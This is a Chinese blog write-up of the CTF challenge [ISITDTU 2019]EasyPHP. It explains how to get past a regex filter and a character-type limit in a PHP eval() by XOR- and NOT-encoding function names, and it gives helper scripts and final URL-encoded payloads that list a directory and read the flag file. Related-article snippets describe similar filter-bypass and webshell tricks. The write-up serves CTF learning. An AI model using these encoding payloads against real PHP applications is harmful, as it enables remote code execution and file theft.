php异或绕过

最新推荐文章于 2023-05-04 21:52:43 发布
最新推荐文章于 2023-05-04 21:52:43 发布
阅读量592 收藏 3
点赞数
文章标签: php python 笔记 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53146913/article/details/130254721
版权

PHP异或绕过,无字符数字RCE

例题:[ISITDTU 2019]EasyPHP

代码:

<?php
highlight_file(__FILE__);

$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
    die('rosé will not do it');

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
    die('you are so close, omg');

eval($_);
?>
源码解析:
1、 count_chars()函数

返回字符串中所用字符的信息(例如,ASCII 字符在字符串中出现的次数,或者某个字符是否已经在字符串中使用过)

语法:
    count_chars(string,mode)
参数描述
string必需。规定要检查的字符串。
mode可选。规定返回模式。默认是 0。以下是不同的返回模式:
0 - 数组,ASCII 值为键名,出现的次数为键值
1 - 数组,ASCII 值为键名,出现的次数为键值,只列出出现次数大于 0 的值
2 - 数组,ASCII 值为键名,出现的次数为键值,只列出出现次数等于 0 的值
3 - 字符串,带有所有使用过的不同的字符
4 - 字符串,带有所有未使用过的不同的字符
if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
    die('you are so close, omg');

3这里的意思就是,限制输入长度为13个字符种类

例子:

<?php
$str = "Hello Aiwin";
echo 111;
echo count_chars($str, 3);
echo strlen(count_chars($str, 3));
 
 
输出: AHeilnow9 //在A之前还有一个空格,也算进字符种类之一。
2、正则过滤
preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_)

https://regex101.com/
在这里插入图片描述

\x00-                           匹配\x00到空格(\x20)
0-9                             匹配0-9的数字
'"`$&.,|[{_defgops              匹配这些字符
\x7F                            匹配DEL(\x7F)字符

+        匹配之前的token在1次和无限次之间,尽可能多的次数,根据需要返回(贪婪)
\x00-' '  匹配ascll码在0-32之间的字符
0-9       匹配范围数字0-9
\'        匹配 '
`" ' $ & .,|[{_defgops` 匹配列表 " ' $ & .,|[{_defgops 中的单个字符。
\x7F      匹配字符十进制127
Payload

首先试试phpinfo()

<?php
print(urlencode(~'phpinfo'));
 
 
输出:
%8F%97%8F%96%91%99%90

在这里插入图片描述

我们查看disable_functions

进行命令执行的函数基本都被过滤了,所以我们可以使用scandir(),var_dump(),readfile(),print_r()等函数查看目录,并获取flag,先获取看目录下的文件,通过print_r(scandir(.))输出当前目录下的内容,同样使用取反绕过。

print_r(scandir(‘.’));查看当前目录下的所有文件名//无参数RCE

绕过字符种类限制

本地写脚本进行实验:

<?php
$_ = $_GET['_'];
echo strlen(count_chars($_,3));

这里使用的print_r(scandir(‘.’)); = ((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF));

但是使用了16 >13种,所以这里的做法是,选取已有的13种,再生成另外的3种,从而绕过过滤。

验证的小脚本:

str = 'pscadi'
target = 'ntr'
 
for m in target:
    for a in str:
        for b in str:
            for c in str:
                if ord(a)^ord(b)^ord(c) == ord(m):
                    print("{} = {}^{}^{}".format(m,a,b,c))
输出(取了三个结果):
n = c^d^i
t = s^c^d
r = p^c^a

所以原来payload的’ntr’可以使用其他字母异或来生成。

即:n=c^d^i,那么n的取反就是n^0xff=c^d^i^0xff也是可以的.
即 
n:  %91^%FF=%9C^%9B^%96^%FF
t:  %8B^%FF=%9C^%9B^%8C^%FF
r:  %8D^%FF=%9E^%9C^%8F^%FF

故:其他字母进行三次的%FF异或,相当于前两次异或后仍然为原来的字符。

print_r:
(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF)

变换成:

(%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)
scandir:
(%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF)

变换成:

(%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)

现在生成的payload:

((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C))^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));

本地测试小脚本:

<?php
$print_r=urldecode('%8F%9E%96%9C%9C%A0%9E')^urldecode('%FF%9C%FF%9B%9B%FF%9C')^urldecode('%FF%8F%FF%96%8C%FF%8F')^urldecode('%FF%FF%FF%FF%FF%FF%FF');
$scandir=urldecode('%8C%9C%9E%9C%9B%96%9E')^urldecode('%FF%FF%FF%9B%FF%FF%9C')^urldecode('%FF%FF%FF%96%FF%FF%8F')^urldecode('%FF%FF%FF%FF%FF%FF%FF');
print($print_r);
print("\n");
print($scandir);
 
输出为:
print_r
scandir

读出文件位置:

在这里插入图片描述

flag文件在最后,可以使用end直接将指针执行最后一个文件,然后读取,使用readfile(end(scandir(.));或者show_source()

还是使用之前的脚本进行生成:

<?php
$_ = $_GET['_'];
echo strlen(count_chars($_,3));
print(urlencode(~'readfile'));

//readfile = %8D%9A%9E%9B%99%96%93%9A
//end = %9A%91%9B
//scandir = %8C%9C%9E%91%9B%96%8D
// . = %D1

现在的payload为:

?_=readfile(end(scandir(.));

?_=((readfile)^(%FF))(((end)^(%FF))(((scandir)^(%FF))(.^%FF)));
?_=((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%91%9B)^(%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));

现在为16种字符,替换为13个字符种类的payload:

str = 'readfile'
target = 'nsc'
 
for m in target:
    for a in str:
        for b in str:
            for c in str:
                if ord(a)^ord(b)^ord(c) == ord(m):
                    print("{} = {}^{}^{}".format(m,a,b,c))
 
输出(取三个结果):
n = a^f^i
s = r^e^d
c = a^d^f

替换之后的payload为:

((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));

换之后的payload为:

((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));
菜菜zhao
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
[ISITDTU 2019]EasyPHP异或绕过
Aiwin的博客
08-24 513
[ISITDTU 2019]EasyPHP count_chars()函数异或绕过
关于php异或的脚本
wuerror的博客
07-26 1230
最近做了道使用异或绕过preg_match()的题,正则的要求是没有字母数字。 网上翻文章,搜集了两个脚本 #朋友给的,也不知道最早是哪个师傅写的 def encode(command): code = "~`!@#$%&*()-=+_[]{};:<>,.?/|" result_1 = "" result_2 = "" for x in command: if not command.isalpha(): r
关于使用异或绕过PHP过滤的方法
qq_54941823的博客
01-18 919
学前基础 异或:只能够是数字和数字之间的异或,原理是转换为二进制进行异或 URL编码使用的也是十六进制的编码,十六进制异或编码的时候用的都是0xff,也就是十进制的255 过程简述:数据的十进制——转换十六进制——进行0xff异或(回到了十进制)——转换为十六进制——再次进行0xff异或得到数据本身 字符——十进制——十六进制进行异或——变回十进制——转到十六进制进行异或——变回十进制——转为字符回到原本字符 实例(_GET) #此处使用python演示 _: 计算前字符 ...
php 字符串异或 绕过,浅析CTF绕过字符数字构造shell
weixin_36349685的博客
03-19 1201
前言在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。无字母数字webshell简单来说就是payload中不能出现字母,数字(有些题目还有其他一些过滤),通过异或取反等方法取得flag。本文涉及知识点实操练习-使用base64与deflate对webshell编码测试源码...
[ISITDTU 2019]EasyPHP php异或绕过减少字符数
scrawman的博客
01-22 1039
[ISITDTU 2019]EasyPHP 一个正则绕过,先看正则匹配过滤了什么 \x00- (\x20) 过滤了00到20的十六进制字符 0-9 过滤了数字 ’ "`$&.,过滤了这些字符和\x7f字符 count_chars模式选为3的话统计字符串里出现过的字符,题目中设置不能超过13(0xd)个 但是没有过滤~和^,可以取反和异或绕过。 <?php echo urlencode(~'phpinfo'); ?> 先用_=(~%8F%97%8F%96%91%99%90)();看
php使用异或实现的加密解密实例
12-18
则b=a ^ c (^是异或的意思),php在处理异或的字符时先把字符转化为二进制的ascii值,对这些值进行异或,获取结果后在将ascii值转化为字符,原理说晚了直接贴实现的代码:复制代码 代码如下:echo ‘<meta charset=...
python 实现按位异或
06-08
# 题目:学习使用按位异或 ^ 。 # 程序分析:0^0=0; 0^1=1; 1^0=1; 1^1=0
labview异或和校验算法
01-02
用labview写的,用于字符串ascii码异或和校验,文件中转有dll库 可以到http://www.ip33.com/bcc.html这个网址验证是否正确
一天一道ctf 第43天(php字符串异或取反绕过)
scrawman的博客
07-24 2433
[极客大挑战 2019]RCE ME 点开题目就是源码 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
php字符串异或,php加密解密(异或,base64,des)
weixin_33739480的博客
03-11 532
前几天给pc端写接口用到数据加密,现在总结下,当时主要做的是对pc端传来的数据进行解密,现在用php模拟下加密以及解密1.加密第一步:先进行异或加密,然后在base64加密function my_jiami($str){//随机取8位数for($i=0;$i<8;$i++){$key.= rand(0,9);}$tmp="";for($i=0;$i$tmp.=substr($str,$i,1...
php异或生成, 全自动解密加密脚本
u011198123的博客
05-04 619
php异或生成脚本,有手就行,直接使用。
PHP异或
sleepywin的博客
03-13 404
php异或
php特性绕过
None安全团队
08-03 994
preg_match() 函数无法处理数组 导致被绕过 payload: ?num[]=1 1 2 3 4 5 6 7 8 9 10 11 12 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!");
字符串异或 php,其他语言如何解密PHP多字符串的异或加密-php字符串异或运算原理...
weixin_27188815的博客
03-11 202
PHP语言的^运算符经常用来做加密的运算,解密也直接用^就行,但是和其他语言通信时,其他语言例如objective-c未必能解的出来PHP的^,尤其是当php使用多个字符串如:abc^def,这样的运算时,其他语言少有这种直接可运算的,更不能解的出来 计算原理: a^b: a和bPHP语言的^运算符经常用来做加密的运算,解密也直接用^就行,但是和其他语言通信时,其他语言例如objective-c未...
file_put_contents 绕过$contents=“<?php die();?>“.$contents,preg_match
feiniaotjx的博客
11-19 1952
绕过<?php die();?>,preg_match 大概意思是传文件名和文件内容,但是两个参数都要经过waf函数过滤,并且文件内容开头加了<?php die();?>,它的意思是直接结束了php语句的执行,相当与exit()退出执行函数,故导致写入php文件的函数无法执行所以我们需要让<?php die()?>不能执行,故可以使用php伪协议写入文件, 利用php://filter/convert.base64-decode/resource=5.php写入文件, $
web安全-PHP-url编码取反绕过正则-思考
qq_45699846的博客
03-09 4117
web安全-PHP-url编码取反绕过正则-思考
php 字符ascii转中文,PHP ASCII码与字符串的相互转换
weixin_39591386的博客
03-09 202
饭可以一日不吃,觉可以一日不睡,书不可以一日不读。以下是小编为大家搜索整理PHP ASCII码与字符串的相互转换,希望能给大家带来帮助!更多精彩内容请及时关注我们应届毕业生考试网![代码]php代码:class ascii {/*** 将ascii码转为字符串* @param type $str 要解码的字符串* @param type $prefix 前缀,默认:* @return type*/...
异或脚本参照
qq_50613938的博客
12-16 992
这是两个异或绕过的脚本, 异或是什么,^这个符号代表的是异或的意思,当我们在PHP语言中输入 echo “b”^“w” 的时候,语言本身会自动计算b和w的ascll编码值的差别,然后直接 输出该差别值的ascll编码数据是谁,这样我们就能够在不输入字母或者数字的条件下利用{}划分区域无字母数字输出数字或字母进行绕过,具体的操作过程下方 <?php function finds($string){ $index = 0; $a=[33,35,36,37,40,41,42,43,45,47,58
preg_match异或绕过
最新发布
06-10
在某些情况下,我们可能需要绕过某些限制或过滤,这时可以使用异或运算符(^)来绕过。 例如,有时候我们需要匹配一个字符串中的数字,但是字符串中可能包含一些其他字符,如果直接使用 preg_match 可能会匹配到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值